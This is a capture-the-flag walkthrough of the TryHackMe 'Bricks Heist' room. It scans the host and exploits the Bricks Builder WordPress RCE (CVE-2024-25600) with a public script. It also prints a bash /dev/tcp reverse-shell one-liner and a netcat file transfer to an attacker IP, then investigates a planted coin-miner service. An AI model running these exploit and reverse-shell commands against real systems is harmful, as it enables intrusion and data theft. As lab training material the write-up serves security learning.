TryHack3M: Bricks Heist

1. Initial Target Setup and Port Scanning

Set Up Host Resolution

First, we set the target hostname/IP in our /etc/hosts file to easily reference the machine:

# /etc/hosts
TARGET_IP   bricks.thm

Define the Target IP and Perform a Fast Full Port Scan

We export the target IP as an environment variable and use Nmap to quickly scan all TCP ports on the target:

export TARGET_IP=10.10.105.128
nmap -p- -Pn --min-rate 5000 $TARGET_IP

Nmap Results Summary:

Not shown: 65409 closed tcp ports (reset), 122 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
3306/tcp open  mysql

---

2. Service Version Detection and Enumeration

We further probe the most interesting ports (80, 443, and 3306) using version detection (-sV) and default scripts (-sC):

nmap -p80,443,3306 -Pn -sV -sC $TARGET_IP

Interpreting the Output:

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Python http.server 3.5 - 3.10
|_http-server-header: WebSockify Python/3.8.10
|_http-title: Error response
443/tcp  open  ssl/http Apache httpd
|_http-generator: WordPress 6.5
| http-robots.txt: 1 disallowed entry 
|_/wp-admin/
|_http-server-header: Apache
3306/tcp open  mysql    MySQL (unauthorized)

Key Points:

• Port 80: Runs a Python HTTP server.
• Port 443: Runs Apache with WordPress 6.5. The robots.txt disallows access to /wp-admin/.
• Port 3306: MySQL is accessible without authorization (likely misconfigured).

---

3. Exploiting a Known Vulnerability

Identifying the Vulnerability

A look at the source code reveals the use of the WordPress Bricks Builder theme (dated 2024/04/02). Research shows the existence of CVE-2024-25600, which is a Remote Code Execution (RCE) vulnerability in the theme. This vulnerability allows an attacker to execute arbitrary code on the server without needing to authenticate.

Exploitation Steps

Clone the public exploit repository and run the script:

git clone https://github.com/Chocapikk/CVE-2024-25600
cd CVE-2024-25600
pip install -r requirements.txt
python3 exploit.py -u "https://bricks.thm"

If successful, you should see a shell running as the Apache user:

id
# uid=1001(apache) gid=1001(apache) groups=1001(apache)

Explanation: The exploit targets the RCE vulnerability in the Bricks Builder theme, giving code execution privileges.

---

4. Upgrading to a Reverse Shell

Since the initial shell is messy, we create a cleaner reverse shell connection.

On Your Local Machine (Listener):

nc -lvnp 6666

On the Target Machine (Connect Back):

bash -c 'sh -i >& /dev/tcp/10.2.17.44/6666 0>&1'

Sanitizing the Terminal

Sometimes the reverse shell terminal can be garbled. Use the following commands to clean it up:

script /dev/null -c bash
# (Then press CTRL+Z to background the current process)
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty size  # Verify the terminal size
stty rows <ROWS> columns <COLUMNS>

Explanation:
These commands reinitialize your shell and terminal settings to ensure proper display and input handling.

---

5. Post-Exploitation: Investigating for Persistence and Malicious Activity

Check for Unusual Services

Look for running services that might be used for persistence or indicate additional compromise:

systemctl list-units --type=service --state=running

Example output:

ubuntu.service       loaded active running TRYHACK3M

Inspect the Suspect Service

View the details of the service:

systemctl cat ubuntu.service

Output:

ExecStart=/lib/NetworkManager/nm-inet-dialog

Change directory to inspect files related to this binary:

cd /lib/NetworkManager/
ls -al

You might see:

-rw-r--r--   1 root root   48190 Apr 11  2024 inet.conf       # Log file
-rwxr-xr-x   1 root root 6948448 Apr  8  2024 nm-inet-dialog  # Binary

Examine the Log File

Check the beginning of inet.conf:

head inet.conf

Example output:

ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2024-04-08 10:46:04,743 [*] confbak: Ready!
2024-04-08 10:46:04,743 [*] Status: Mining!
...

Observation:
The log indicates that a Bitcoin mining operation was started.

---

6. Analyzing the Suspect Binary

Check the Binary File Type:

file nm-inet-dialog

Output:

nm-inet-dialog: ELF 64-bit LSB executable, x86-64, dynamically linked, stripped

Explanation:
This shows that nm-inet-dialog is a stripped Linux binary, making reverse engineering more challenging.

Decoding an Embedded String

The log file begins with a long hexadecimal string. A helper script (triple_decoder.py) decodes it by:

1. Converting from hex to bytes.
2. Applying two rounds of Base64 decoding.

triple_decoder.py:

import base64

def hex_then_double_base64_decode(hex_string):
    """
    Decodes a hex string, then performs two rounds of Base64 decoding.
    """
    try:
        # Step 1: Convert hex to bytes
        byte_data = bytes.fromhex(hex_string)
        # Step 2: First Base64 decode
        decoded_data_1 = base64.b64decode(byte_data)
        # Step 3: Second Base64 decode
        final_decoded_data = base64.b64decode(decoded_data_1)
        return final_decoded_data.decode('utf-8')
    except ValueError as e:
        return f"Error: Invalid input - {e}"
    except Exception as e:
        return f"An unexpected error occurred: {e}"

hex_input = input("Enter the hexadecimal string: ")
decoded_string = hex_then_double_base64_decode(hex_input)
print(decoded_string)

Run the Script:

python3 triple_decoder.py

Input the long hexadecimal string (from the log) when prompted:

5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d

Output:

bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qabc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa

Observation:
The decoded string appears to be a Bech32 Bitcoin address (starts with “bc1q”) repeated twice. Although research did not reveal this as a real wallet, it is a hint linking this activity to the LockBit Ransomware Group.

---

7. Exfiltrating the Binary for Offline Analysis

Respecting the binary’s integrity, you might want to transfer it for further offline analysis (e.g., using VirusTotal or a dedicated reverse engineering environment).

Transfer via Netcat:

On the Receiver (Local Machine):

nc -lvnp 6666 > nm-inet-dialog

On the Sender (Target Machine):

nc 10.2.17.44 6666 < nm-inet-dialog

This simple Netcat transfer allows you to safely extract the suspect binary for detailed analysis. Subsequent testing (e.g., on VirusTotal) confirmed that the binary is indeed a coin miner.